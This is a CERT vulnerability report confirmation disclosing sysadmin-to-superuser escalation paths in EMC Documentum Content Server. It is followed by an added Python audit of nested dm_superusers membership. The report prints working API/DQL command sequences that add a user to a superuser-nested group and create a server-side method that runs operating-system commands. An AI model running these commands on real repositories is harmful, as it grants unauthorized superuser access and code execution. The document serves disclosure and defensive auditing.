Vulnerability Report Confirmation - [VRF#HUDHKNW4]

Your vulnerability report has been successfully received. You may save or print this page for your own records. The Report Tracking ID assigned to this report is VRF#HUDHKNW4. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to cert@cert.org. Please reference this Report Tracking ID: VRF#HUDHKNW4.

------------------------------------------------------------------------

Vulnerability Report

Name: Andrey B. Panfilov
Organization: independent
Email Address: andrew@panfilov.tel
Telephone Number:

Vulnerability Description:

EMC Documentum Content Server: ESA-2012-009 was not properly analyzed and fixed. According to ESA-2012-009, a user with the sysadmin privilege should not be able to elevate his privileges; nevertheless, the documentation does not describe several sysadmin capabilities that lead to privilege elevation:

1. A sysadmin is not able to modify the dm_superusers_dynamic and dm_superusers system groups (dm_superusers membership grants superuser privileges), but he is able to modify groups that belong to the dm_superusers system group. Content Server by default creates the dcs_privileged_users group, which belongs to the dm_superusers system group; a sysadmin is able to modify dcs_privileged_users and thereby gain superuser privileges:

API> ?,c,alter group dm_superusers add testadmin
[DM_QUERY_E_BAD_GROUP_SAVE]error: "CREATE or ALTER GROUP: Unable to save the group."
[DM_GROUP_E_NEED_SUPER_USER_PRIV]error: "The current user (testadmin) needs to have superuser privilege to save the group object."
API> ?,c,alter group dm_superusers_dynamic add testadmin
[DM_QUERY_E_BAD_GROUP_SAVE]error: "CREATE or ALTER GROUP: Unable to save the group."
[DM_GROUP_E_NEED_SUPER_USER_PRIV]error: "The current user (testadmin) needs to have superuser privilege to save the group object."
API> ?,c,select groups_names from dm_group where group_name='dm_superusers'
groups_names
-----------------------
dcs_privileged_users
dm_superusers_dynamic
(2 rows affected)
API> ?,c,update dm_group object set is_dynamic=FALSE where group_name='dcs_privileged_users'
objects_updated
---------------
1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your UPDATE statement."
API> ?,c,alter group dcs_privileged_users add testadmin
OK

Note the UPDATE that clears is_dynamic before the ALTER GROUP: membership of a dynamic group only takes effect for sessions that are entitled to use dynamic groups (see item 4), whereas membership of a static group applies unconditionally. Any group reachable from dm_superusers through nested groups_names, not only the two protected system groups, is therefore superuser-equivalent and needs the same save protection.

2. A sysadmin is able to perform dump and load operations, so he is able to create malicious superusers through a load operation.

3. A sysadmin is able to create dm_method objects, so he is able to execute any code on the Content Server host and thereby elevate privileges. With run_as_server=TRUE the method_verb runs under the operating-system account of the Content Server itself:

API> ?,c,create dm_method object set object_name='test method', set method_verb='echo test_method > /tmp/test', set method_type='programm', set run_as_server=TRUE
object_created
----------------
1001ffd7800f07bc
(1 row affected)
API> ?,c,execute do_method with method='test method'
....
(1 row affected)
Bye
~ ]$ cat /tmp/test
test_method
~ ]$

4. A sysadmin is able to create/modify dm_client_rights objects. These objects store information about the capabilities of remote clients, such as the ability to perform trusted authentication and to use dynamic groups, so by creating/modifying dm_client_rights objects a sysadmin is able to elevate privileges.

5. A sysadmin is able to create/modify dmc_module objects. These objects "contain" Java code that is executed on Java clients, the Documentum Java Method Server for example, so a sysadmin is able to execute any code on the Documentum Java Method Server and thereby elevate privileges.

Can we provide your name to the vendor? Yes
Do you want to be publicly acknowledged? Yes
Vendor Contact Status: will not contact
Vendor Name: EMC
Vendor Contact Name:
Vendor Contact Email:
Vendor Contact Telephone Number:
Vendor Tracking ID:
Additional Vendor Information:
Affected System Configurations: All versions of EMC Documentum Content Server
How was this vulnerability found?
Is the vulnerability being exploited? Yes
Is there a public exploit? No
Vulnerability Impact: The same as ESA-2012-009
Comments:
Attached File:
Date: 2014-04-23T23:23:57
Report Tracking ID: VRF#HUDHKNW4
CERT Tracking IDs:

------------------------------------------------------------------------
©2014 Carnegie Mellon University
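Added audit example for item 1 of the description above. It is not part of the reporter's submission and not EMC code: it walks the nested membership of dm_superusers the way the transcript's select on groups_names does, reports every user who is effectively a superuser together with the group path that grants it, separates memberships that depend on a dynamic group from those that apply unconditionally, lists the groups inside that closure that a sysadmin is still allowed to save, and replays the reporter's two statements (update is_dynamic, alter group add) on a copy of the data to show testadmin appearing as an unconditional superuser. The input rows are constructed here to mirror the columns of `select group_name, groups_names, users_names, is_dynamic from dm_group`; apart from dm_superusers, dm_superusers_dynamic, dcs_privileged_users, dmadmin and testadmin, all group and user names are invented, and the functions assume that shape of input.

```python
"""Nested-group audit for the dm_superusers closure (added example, not from the report).

SAMPLE_GROUPS is a constructed stand-in for the rows returned by
    select group_name, groups_names, users_names, is_dynamic from dm_group
On a real repository, feed those rows into the same functions.
"""

import copy
from collections import deque

# Only superusers may save these two groups (DM_GROUP_E_NEED_SUPER_USER_PRIV in the transcript).
PROTECTED_GROUPS = {"dm_superusers", "dm_superusers_dynamic"}

# Constructed sample modelled on the transcript; "svc_bof", "docu" and "alice" are invented.
SAMPLE_GROUPS = {
    "dm_superusers": {
        "groups_names": ["dcs_privileged_users", "dm_superusers_dynamic"],
        "users_names": ["dmadmin"],
        "is_dynamic": False,
    },
    "dm_superusers_dynamic": {"groups_names": [], "users_names": [], "is_dynamic": True},
    "dcs_privileged_users": {"groups_names": [], "users_names": ["svc_bof"], "is_dynamic": True},
    "docu": {"groups_names": [], "users_names": ["alice"], "is_dynamic": False},
}


def superuser_closure(groups, root="dm_superusers"):
    """Breadth-first walk over groups_names; returns {group: path of groups from root}."""
    paths = {root: [root]}
    queue = deque([root])
    while queue:
        current = queue.popleft()
        for child in groups.get(current, {}).get("groups_names", []):
            if child not in paths:  # ignores cycles and duplicate edges
                paths[child] = paths[current] + [child]
                queue.append(child)
    return paths


def effective_superusers(groups, root="dm_superusers"):
    """Split users of every group in the closure into two maps of user -> path.

    unconditional: every group on the path is static, so the membership always applies.
    conditional:   a dynamic group is on the path; that membership is only honoured for
                   sessions entitled to use dynamic groups (item 4 of the report), which
                   is why the reporter set is_dynamic=FALSE before adding testadmin.
    """
    unconditional, conditional = {}, {}
    for group, path in superuser_closure(groups, root).items():
        if group not in groups:
            continue  # dangling groups_names entry, nothing to expand
        dynamic_on_path = any(groups[g]["is_dynamic"] for g in path if g in groups)
        bucket = conditional if dynamic_on_path else unconditional
        for user in groups[group]["users_names"]:
            bucket.setdefault(user, path)
    return unconditional, conditional


def sysadmin_writable_in_closure(groups, root="dm_superusers"):
    """Groups that grant superuser transitively but are not protected from sysadmin saves.

    Anything listed here is the gap described in item 1; a hardened repository returns [].
    """
    return sorted(g for g in superuser_closure(groups, root) if g not in PROTECTED_GROUPS)


def apply_reporter_sequence(groups, attacker="testadmin", via="dcs_privileged_users"):
    """Replay the two statements from the transcript on a copy of the rows:
    update dm_group object set is_dynamic=FALSE where group_name=<via>;
    alter group <via> add <attacker>.
    """
    after = copy.deepcopy(groups)
    after[via]["is_dynamic"] = False
    after[via]["users_names"].append(attacker)
    return after


if __name__ == "__main__":
    print("sysadmin-writable groups inside dm_superusers:",
          sysadmin_writable_in_closure(SAMPLE_GROUPS))
    before_unconditional, before_conditional = effective_superusers(SAMPLE_GROUPS)
    after_unconditional, _ = effective_superusers(apply_reporter_sequence(SAMPLE_GROUPS))
    print("unconditional superusers before:", before_unconditional)
    print("conditional (dynamic) superusers before:", before_conditional)
    print("unconditional superusers after replaying the transcript:", after_unconditional)
```

The walk is the part worth carrying over to a real repository: checking only the direct users_names of dm_superusers misses every group nested underneath it, and that nesting is exactly what the report exploits.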